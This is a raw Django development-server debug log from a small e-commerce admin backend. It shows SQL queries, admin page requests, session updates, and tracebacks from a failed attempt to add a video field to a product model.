"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:27:24,902 utils 30355 140219454052096 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:27:24.900389+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 27, 24, 900389, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:27:24] "GET /shop/product/2/change/ HTTP/1.0" 200 9177 DEBUG 2019-12-06 13:27:25,195 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:27:25.186440+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 27, 25, 186440, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:27:25,198 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:27:25] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:28:38,226 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:28:38.217768+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 28, 38, 217768, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:28:38,229 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:28:38,232 utils 30355 140219454052096 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 13:28:38,240 utils 30355 140219454052096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 13:28:38,242 utils 30355 140219454052096 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 13:28:38,327 utils 30355 140219454052096 (0.002) UPDATE "shop_product" SET "category_id" = 1, "name" = 'Aman', "slug" = 'aman', "image" = 'products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg', "video" = 'videos/2019/12/06/Lightning_Bursts_1_2286_4K.mov', "description" = 'aSas', "price" = '12', "stock" = 12, "available" = true, "created" = '2019-12-06T12:49:47.183495+00:00'::timestamptz, "updated" = '2019-12-06T13:28:38.324621+00:00'::timestamptz WHERE "shop_product"."id" = 2; args=(1, 'Aman', 'aman', 'products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg', 'videos/2019/12/06/Lightning_Bursts_1_2286_4K.mov', 'aSas', '12', 12, True, datetime.datetime(2019, 12, 6, 12, 49, 47, 183495, tzinfo=), datetime.datetime(2019, 12, 6, 13, 28, 38, 324621, tzinfo=), 2) DEBUG 2019-12-06 13:28:38,330 utils 30355 140219454052096 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-06T13:28:38.328924+00:00'::timestamptz, 6, 9, '2', 'Aman', 2, '[{"changed": {"fields": ["video"]}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 6, 13, 28, 38, 328924, tzinfo=), 6, 9, '2', 'Aman', 2, '[{"changed": {"fields": ["video"]}}]') [06/Dec/2019 13:28:38] "POST /shop/product/2/change/ HTTP/1.0" 302 0 DEBUG 2019-12-06 13:28:38,638 utils 30355 140219454052096 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:28:38.625207+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 28, 38, 625207, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:28:38,642 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:28:38,646 utils 30355 140219454052096 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:28:38,647 utils 30355 140219454052096 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:28:38,652 utils 30355 140219454052096 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 13:28:38,786 utils 30355 140219454052096 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:28:38.784705+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 28, 38, 784705, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:28:38] "GET /shop/product/ HTTP/1.0" 200 10181 DEBUG 2019-12-06 13:28:39,085 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:28:39.076474+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 28, 39, 76474, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:28:39,088 utils 30355 140219454052096 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:28:39] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:28:44,650 utils 30355 140219454052096 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:28:44.636086+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 28, 44, 636086, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:28:44,654 utils 30355 140219454052096 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:28:44,659 utils 30355 140219454052096 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 13:28:44,739 utils 30355 140219454052096 (0.004) DECLARE "_django_curs_140219454052096_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:28:44,801 utils 30355 140219454052096 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:28:44.798180+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 28, 44, 798180, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:28:44] "GET /shop/product/2/change/ HTTP/1.0" 200 9337 DEBUG 2019-12-06 13:28:45,105 utils 30355 140219454052096 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:28:45.094183+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 28, 45, 94183, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:28:45,110 utils 30355 140219454052096 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:28:45] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 13:30:16] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 06, 2019 - 13:16:43 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-06 13:34:23,395 utils 31061 139977684510464 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-06 13:34:23,402 utils 31061 139977684510464 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-06 13:34:24,722 utils 31061 139977651853056 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:34:24.704167+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 34, 24, 704167, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:34:24,727 utils 31061 139977651853056 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:34:24,733 utils 31061 139977651853056 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."clip_video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 13:34:24,824 utils 31061 139977651853056 (0.002) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-06 13:34:24,937 utils 31061 139977651853056 (0.002) DECLARE "_django_curs_139977651853056_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:34:25,030 utils 31061 139977651853056 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:34:25.028277+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 34, 25, 28277, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:34:25] "GET /shop/product/2/change/ HTTP/1.0" 200 9805 DEBUG 2019-12-06 13:34:25,301 utils 31061 139977651853056 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:34:25.288267+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 34, 25, 288267, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:34:25,306 utils 31061 139977651853056 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:34:25] "GET /jsi18n/ HTTP/1.0" 200 3223 /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 06, 2019 - 13:34:23 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 85, in class Product(models.Model): File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 94, in Product clip_video = models.VedioField(upload_to='videos/%Y/%m/%d', null=True) # enable videos AttributeError: module 'django.db.models' has no attribute 'VedioField' /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-06 13:50:12,167 utils 31703 140499953338112 (0.005) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-06 13:50:12,172 utils 31703 140499953338112 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 06, 2019 - 13:50:12 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from videofield.models import VideoField ImportError: cannot import name 'VideoField' /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from videofield.models import VideoField ImportError: cannot import name 'VideoField' /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 109, in inner_run autoreload.raise_last_exception() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 77, in raise_last_exception raise _exception[1] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 337, in execute autoreload.check_errors(django.setup)() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/__init__.py", line 24, in setup apps.populate(settings.INSTALLED_APPS) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/registry.py", line 114, in populate app_config.import_models() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/apps/config.py", line 211, in import_models self.models_module = import_module(models_module_name) File "/usr/local/lib/python3.6/importlib/__init__.py", line 126, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 994, in _gcd_import File "", line 971, in _find_and_load File "", line 955, in _find_and_load_unlocked File "", line 665, in _load_unlocked File "", line 678, in exec_module File "", line 219, in _call_with_frames_removed File "/home/resfx/public_html/admin.resfx.com/backend/shop/models.py", line 3, in from videofield.models import VideoField ImportError: cannot import name 'VideoField' /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-06 13:59:51,965 utils 32196 139885182027520 (0.006) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-06 13:59:51,973 utils 32196 139885182027520 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 